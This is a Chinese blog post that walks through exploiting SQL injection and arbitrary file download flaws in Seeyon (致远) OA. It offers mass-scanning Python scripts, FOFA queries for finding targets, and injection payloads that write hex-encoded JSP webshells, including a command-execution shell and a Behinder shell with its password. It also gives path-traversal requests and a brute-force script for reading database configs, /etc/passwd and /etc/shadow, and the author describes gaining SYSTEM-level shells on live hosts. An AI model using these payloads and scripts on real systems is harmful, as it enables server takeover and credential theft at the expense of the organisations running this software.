致远OA SQL&任意文件下载漏洞(含批量检测POC)

最新推荐文章于 2024-06-25 21:00:00 发布
最新推荐文章于 2024-06-25 21:00:00 发布
阅读量3k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: sql 数据库 安全 OA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/129688344
版权

文章目录

SQL注入

A6 test.jsp SQL注入漏洞

致远OA A6 test.jsp 存在sql注入漏洞,并可以通过注入写入webshell文件控制服务器

漏洞影响

致远OA A6

网络测绘

app=“致远OA6”

批量检测POC

# -*- coding: utf-8 -*-
'''
@Time    : 2023-03-19 22:23
@Author  : whgojp
@File    : POC.py

'''
import requests
import threading

def check_basedir(url, index, total):
    target_url = url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)"   #查看数据库库安装目录
    try:
        response = requests.get(target_url)
        if response.status_code == 200:
            with open("result.txt", "a") as f:
                print(f"[{index}/{total}] {url}")
                f.write(url + "\n")
    except:
        pass

with open("urls.txt", "r") as f:
    urls = f.read().splitlines()

total = len(urls)
threads = []
for i, url in enumerate(urls):
    t = threading.Thread(target=check_basedir, args=(url, i+1, total))
    t.start()
    threads.append(t)

for t in threads:
    t.join()

在这里插入图片描述
在这里插入图片描述
当然扫描结果可能不是特别准确,可能因素是网络测绘工具根据语法收集的ip有出入,或者有waf检测到恶意流量跳转到防护页面等,状态码也是200。以后检测漏洞应该使用正则表达式检测是含有页面关键词
通过信息收集,查出web根目录D:/UFseeyon/OA/tomcat/webapps/yyoa,通过 into outfile 写入文件,这里因为 jsp木马存在特殊符号,使用 hex编码 上传允许文件上传的jsp文件
常规上传:

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

HEX编码

3C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C5C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E

payload
写入文件上传网马

/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex('3c25206966282230222e657175616c7328726571756573742e676574506172616d657465722822707764222929297b206a6176612e696f2e496e70757453747265616d20696e203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822692229292e676574496e70757453747265616d28293b20696e742061203d202d313b20627974655b5d2062203d206e657720627974655b323034385d3b206f75742e7072696e7428223c7072653e22293b207768696c652828613d696e2e7265616428622929213d2d31297b206f75742e7072696e746c6e286e657720537472696e67286229293b207d206f75742e7072696e7428223c2f7072653e22293b207d20253e')%20%20into%20outfile%20'webpath+0.jsp'

在这里插入图片描述
显示上图则上传成功,访问 0.jsp 为空白不报错页面不存在就是上传成功

这里我上传成功了,但是访问0.jsp出现报错页面,应该是对方做了相关防护
换个目标,下图显示就是成功上传

上传冰蝎
在这里插入图片描述

t=%3C%25%40page%20import%3D%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%22%25%3E%3C%25!class%20U%20extends%20ClassLoader%7BU(ClassLoader%20c)%7Bsuper(c)%3B%7Dpublic%20Class%20g(byte%20%5B%5Db)%7Breturn%20super.defineClass(b%2C0%2Cb.length)%3B%7D%7D%25%3E%3C%25if%20(request.getMethod().equals(%22POST%22))%7BString%20k%3D%22e45e329feb5d925b%22%3Bsession.putValue(%22u%22%2Ck)%3BCipher%20c%3DCipher.getInstance(%22AES%22)%3Bc.init(2%2Cnew%20SecretKeySpec(k.getBytes()%2C%22AES%22))%3Bnew%20U(this.getClass().getClassLoader()).g(c.doFinal(new%20sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3B%7D%25%3E

连接密码rebeyond 直接冰蝎连接
在这里插入图片描述

java webshell直接system权限、无需提权
在这里插入图片描述
批量写马脚本就不贴上去了

A6 setextno.jsp SQL注入漏洞

网络测绘

title=“致远A8+协同管理软件.A6”

payload

/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(1)),4#

批量检测POC

import concurrent.futures
import requests


def check_vuln(url, index):
    target_url = f"{url}/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(1)),4#"
    try:
        response = requests.get(target_url)
        if "c4ca4238a0b923820dcc509a6f75849b" in response.text:
            print(f"[+] {url} is vulnerable")
            with open('result.txt', 'a') as f:
                f.write(f"{url} is vulnerable\n")
        else:
            pass
            # print(f"[-] {url} is not vulnerable")
    except requests.exceptions.RequestException as e:
        pass
        # print(f"[!] Exception occurred while checking {url}: {e}")

    print(f"[{index+1}/{len(urls)}] {url} checked")


with open('urls.txt', 'r') as f:
    urls = f.read().splitlines()

with concurrent.futures.ThreadPoolExecutor() as executor:
    futures = []
    for i, url in enumerate(urls):
        if not url.startswith('http'):
            url = 'http://' + url
        futures.append(executor.submit(check_vuln, url, i))

    # 等待所有任务执行完毕
    for future in concurrent.futures.as_completed(futures):
        pass

同是sql注入 利用方式同上 写入冰蝎
上传文件上传网马:

http://xxx.xxx.xxx/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(select unhex('3C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E')  into outfile 'D:/Program Files/UFseeyon/OA/tomcat/webapps/yyoa/test_upload.jsp'),4#

其他操作同上
直接连接就行了

任意文件下载(读取)

webmail.do 任意文件下载 CNVD-2020-62422

影响版本

致远OA A6-V5
致远OA A8-V5
致远OA G6

payload

致远OA webmail.do文件读取漏洞,由于/seeyon/webmail.do 页面 filePath 参数过滤不严,导致可以读取系统敏感文件。
通过修改filePath参数来下载服务器文件

http://www.xxx.com/seeyon/webmail.do?method=doDownloadAtt&filename=test.txt&filePath=../conf/datasourceCtp.properties

在漏洞的OA 系统将会下载 datasourceCtp.properties 配置文件

网络测绘

app=“致远互联-OA”

批量检测POC

读取同目录下urls.txt 多线程扫描将结果输出到result.txt并且显示扫描进程

# -*- coding: utf-8 -*-
'''
@Time    : 2023-03-19 18:33
@Author  : whgojp
@File    : CNVD-2020-62422.py

'''
import requests
import sys
import threading
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from concurrent.futures import ThreadPoolExecutor, as_completed

def POC_1(target_url):
    if 'https' not in target_url:
        target_url = 'http://'+target_url
    vuln_url = target_url + "/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath=../conf/datasourceCtp.properties"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        if "workflow" in response.text:
            print("\033[32m[o] 目标{}存在漏洞 \033[0m".format(target_url))
            result.append(target_url + " 存在漏洞")
        else:
            print("\033[31m[x] 文件请求失败 \033[0m")
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)

def main():
    global result
    result = []
    with open('urls.txt', 'r') as f:
        urls = f.readlines()
    urls = [url.strip() for url in urls]
    total_num = len(urls)
    count = 0
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = [executor.submit(POC_1, url) for url in urls]
        for future in as_completed(futures):
            count += 1
            print("[+] Progress: {}/{}".format(count, total_num))
    with open('result.txt', 'w') as f:
        for r in result:
            f.write(r + '\n')
    print("[+] 扫描完成!")

if __name__ == '__main__':
    main()

在这里插入图片描述
在这里插入图片描述
思考:可以读取那些文件?来进一步利用
尝试读取etc/passwd etc/shadow等敏感文件
linux_file.txt为收集的linu下敏感文件绝对路径的字典

# -*- coding: utf-8 -*-
'''
@Time    : 2023-03-19 21:20
@Author  : whgojp
@File    : brute_filepath.py

'''
import requests
import re

url_prefix = "http://xx.xx.xx:port/seeyon/webmail.do?method=doDownloadAtt&filename=text.txt&filePath=../../../../.."
with open('linux_file.txt', 'r') as f:
    for line in f:
        url = url_prefix + line.strip()  # strip()用于移除行末的换行符
        response = requests.get(url)
        if response.status_code == 200:
            pattern = re.compile(r'[a-zA-Z]')
            if pattern.search(response.text):
                print(url)
               #print(response.test)

思路:收集一些关于目标网站第三方程序绝对路径,比如说,现在我们知道该OA的版本以及CKEditor编辑器,那么就可以收集关于这些程序的敏感文件的绝对路径在这里插入图片描述
效果图:
在这里插入图片描述
在这里插入图片描述

今天是 几号
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
tutemastev#PeiQi-WIKI-POC#银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437
07-25
银澎云计算 好视通视频会议系统 任意文件下载漏洞描述银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感信息漏洞影响银澎云计算 好视通视
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 551
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
致远OA敏感信息泄露漏洞合集(批量检测POC)
最新发布
Karka_的博客
06-25 2445
用友致远OA协同管理软件为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、文化建设、规范管理、资源整合、运营管控等难题,是组织管理的最佳实践。产品系列: A3、A6、A8品牌: 用友对象: 微型、小型企业、企业部门级。
致远OA任意文件下载漏洞CNVD-2020-62422
1stPeak's Blog
06-15 6973
漏洞描述 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 payload 致远OA webmail.do文件读取漏洞, 由于 /seeyon/webmail.do 页面 filePath 参数过滤不严,导致可以读取系统敏感文件。 通过修改filePath参数来下载服务器文件 /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.proper
致远OA漏洞复现
热门推荐
混子
12-31 5万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发现了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞复现一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC
2023 致远OA-任意用户密码重置漏洞
weixin_45908624的博客
09-14 2708
致远OA 短信验证码绕过重置密码漏洞
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
该“NACOS身份认证绕过漏洞批量检测poc”是一个Proof of Concept(概念验证)文件,用于验证这个安全漏洞是否存在。POC文件通常包一段代码或者脚本,开发者或安全研究人员可以使用这些代码来测试特定系统是否易受...
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
蓝海卓越计费管理系统任意文件读取批量检测脚本
06-16
-u 指定单个url -l 指定url文件 先用fofa搜索所有涉及蓝海系统的url,然后直接跑这个脚本就可以
瑞友天翼2024SQL注入漏洞poc
02-27
标题中的“瑞友天翼2024SQL注入漏洞poc”指的是瑞友天翼2024版本存在SQL注入漏洞,而POC(Proof of Concept)是指概念验证,通常是一个简单的程序或脚本,用于证明某个安全漏洞确实存在。在网络安全领域,POC是黑客...
安全开发Python网页OA系统POC漏洞检测系统,框架FLask + python + OAPOC payload
07-19
Python网页OA系统POC漏洞检测系统 框架FLask + python + OAPOC payload 角色介绍 管理员 admin 123456 模块介绍 登录模块 首页模块 OA安全检测子模块(支持多个url或者单个url检测,调用payload并在界面回馈检测...
致远OA文件上传漏洞(批量检测POC)
ZL_1618的博客
04-04 1665
漏洞描述* 漏洞描述文章内容仅供学习参考请勿用于非法用途。
【新】致远OA从前台XXE到RCE漏洞分析
C20220511的博客
11-06 2630
和我们之前分享过的通达OA漏洞类似,这类主流OA系统现在想要直接一步达到RCE的效果是非常困难的。根据错误提示反向找到对应的逻辑代码com.seeyon.agent.common.interceptor. SecurityInterceptor的preHandle方法,这应该是全局的拦截器,其中关键的代码如图3.6所示。在java环境下是不能直接通过XXE来执行系统命令的,并且这里的XXE是不具有回显的功能,仅能通过XXE来达到SSRF的效果,并且只能进行GET类型的请求。那么这些参数是怎么来的呢?
【nday】HVV 致远OA漏洞合集
伏一
05-27 3669
然后调用未授权的文件上传接口上传webshell文件,webshell地址: /seeyon/apps_res/addressbook/images/config.jspx。致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3。致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3。app="致远互联-OA" && title="V8.0SP2"body="yyoa" && app="致远互联-OA"title="致远A8+协同管理软件.A6"
致远OA漏洞分析、利用与防护合集
不忘初心,护天下安全!
06-21 3795
致远OA办公自动化软件, 用于OA办公自动化软件的开发销售,由用友致远互联旗下协同管理软件系统,在国内很多央企、大型公司都有广泛应用。致远互联基于“组织行为管理”理论,自主研发了V5协同管理平台,开发了面向中小企业组织的A6+产品,面向中大型企业和集团性企业组织的A8+产品,以及面向政府组织及事业单位的G6产品 。致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息app="致远互联-OA"验证POC 在存在漏洞OA 系统将会下载 datasourceCtp.properties
致远OA webmail.do任意文件下载 CNVD-2020-62422
PeiQi的博客
01-25 5221
致远OA webmail.do任意文件下载 CNVD-2020-62422 漏洞描述 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 漏洞影响 致远OA A6-V5 致远OA A8-V5 致远OA G6 漏洞复现 访问 url http://xxx.xxx.xxx.xxx/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath=…/conf/datasourceCtp.prope
nacos身份认证绕过漏洞批量检测poc
06-23
### 回答1: Nacos是一种开源的配置中心和服务发现平台,可以帮助开发者更方便地管理微服务架构。然而,最近在Nacos中发现了一个名为身份认证绕过的漏洞,这使得攻击者可以绕过身份验证,执行恶意操作。 为了帮助企业和个人快速检测到这个安全漏洞,并采取相应的补救措施,一些安全研究者开发了批量检测POC。这个POC利用公开的漏洞信息,测试Nacos的登录和注册功能,以确定Nacos是否存在身份认证绕过漏洞。 使用这个批量检测POC,用户可以将所有的IP地址列表保存到一个文本文件中,然后通过简单的命令行选项传递该文本文件的路径。这个POC将自动扫描并验证每个IP地址是否容易受到身份认证绕过漏洞的攻击。 总体来说,这个批量检测POC提供了一种简单、快速、有效的方式,帮助企业和个人识别并修复Nacos中的身份认证绕过漏洞,从而提高系统的安全性和可靠性。同时,这也反映了业界对于技术安全的持续关注和努力。 ### 回答2: nacos是一个云原生的动态服务发现和配置管理平台,但是在nacos中存在着身份认证绕过漏洞,攻击者可以通过此漏洞直接绕过身份验证,获取到nacos的管理权限。为了防止此漏洞被滥用,需要及时对其进行检测和修复。 Nacos身份认证绕过漏洞批量检测可以采用Poc技术进行,Poc即Proof of Concept,意为概念证明。通过编写Poc代码,可以在不影响正常运行的情况下,模拟攻击行为,发现漏洞并进行修复。 对于nacos身份认证绕过漏洞批量检测Poc,可以通过以下步骤实现: 1. 首先,确定目标,即需要检测的nacos服务地址。可以通过搜索引擎、网络扫描等方式获取目标。 2. 编写Poc代码,对目标进行检测。具体步骤如下: (1)通过无需认证的接口验证目标是否存在身份认证绕过漏洞。 (2)如果存在漏洞,则可以使用管理员权限执行恶意操作,如读取、修改、删除配置文件等。 3. 对漏洞进行修复。修补漏洞的方法是将nacos系统更新至最新版本,并且配置正确,以避免任何安全问题。 通过进行nacos身份认证绕过漏洞批量检测Poc,可以及时发现和修复nacos系统中的漏洞问题,从而提高系统的安全性和稳定性。同时,作为云原生的重要组件之一,nacos系统的安全问题也需要得到更高的重视和加强保护。 ### 回答3: Nacos是一种开源的分布式服务发现、配置和管理平台,最近出现了一个身份认证绕过漏洞。攻击者可以利用该漏洞绕过Nacos的身份验证,实现未经授权访问敏感信息或执行恶意操作。为了增强安全性,开发人员需要尽快修补漏洞。 为方便安全研究人员和开发人员识别漏洞,可以使用批量检测pocpoc是Proof of Concept的缩写,通常是指一段代码或脚本,用来验证漏洞是否存在的可复现方式。通过使用poc,可以确认漏洞的确存在,便于修复。 对于Nacos身份认证绕过漏洞,可以使用poc进行批量检测。首先需要构造一份包有效用户名和密码的列表,然后使用poc对Nacos进行检测。如果检测漏洞,则会产生警报或输出,方便管理员及时修复漏洞。 因此,在使用Nacos时,开发人员需要及时修复漏洞,并通过poc等方式进行漏洞检测,以便及时发现和修复其他潜在的安全漏洞,提高系统的安全性和可靠性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值